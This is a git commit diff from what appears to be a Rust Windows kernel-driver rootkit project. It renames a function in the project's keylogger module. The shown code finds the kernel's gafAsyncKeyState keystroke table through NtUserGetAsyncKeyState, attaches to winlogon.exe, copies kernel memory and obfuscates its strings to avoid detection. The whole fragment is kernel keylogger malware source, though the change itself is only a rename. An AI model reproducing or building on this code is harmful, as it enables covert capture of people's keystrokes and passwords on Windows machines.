Renaming the gafAsyncKeyState recovery function

2026-01-02 07:04:28 +01:00 · 2024-07-26 19:51:27 -03:00
parent 75558980cc
commit b9075399c0
2 changed files with 3 additions and 3 deletions
--- a/driver/src/keylogger/mod.rs
+++ b/driver/src/keylogger/mod.rs
@@ -8,7 +8,7 @@ use {
        get_ks_byte, get_ks_down_bit,
        includes::MmCopyVirtualMemory,
        is_key_down, set_key_down,
-        utils::{get_function_address_asynckey, get_module_base_address, get_process_by_name},
+        utils::{get_address_asynckey, get_module_base_address, get_process_by_name},
    }, 
    wdk_sys::{
        ntddk::{
@@ -181,7 +181,7 @@ unsafe fn get_gafasynckeystate_address() -> Option<PVOID> {
        Some(addr) => addr,
        None => return None
    };
-    let function_address = match get_function_address_asynckey(obfstr!("NtUserGetAsyncKeyState"), module_address) {
+    let function_address = match get_address_asynckey(obfstr!("NtUserGetAsyncKeyState"), module_address) {
        Some(addr) => addr,
        None => return None,
    };
--- a/driver/src/utils/mod.rs
+++ b/driver/src/utils/mod.rs
@@ -166,7 +166,7 @@ pub unsafe fn get_function_address(function_name: &str, dll_base: *mut c_void) -
 /// # Returns
 /// - `Option<*mut c_void>`: An optional pointer to the function's address, or None if the function is not found.
 ///
-pub unsafe fn get_function_address_asynckey(name: &str, dll_base: *mut c_void) -> Option<*mut c_void> {
+pub unsafe fn get_address_asynckey(name: &str, dll_base: *mut c_void) -> Option<*mut c_void> {
    let mut apc_state: KAPC_STATE = core::mem::zeroed(); 
    let pid = match get_process_by_name(obfstr!("winlogon.exe")) {
        Some(p) => p,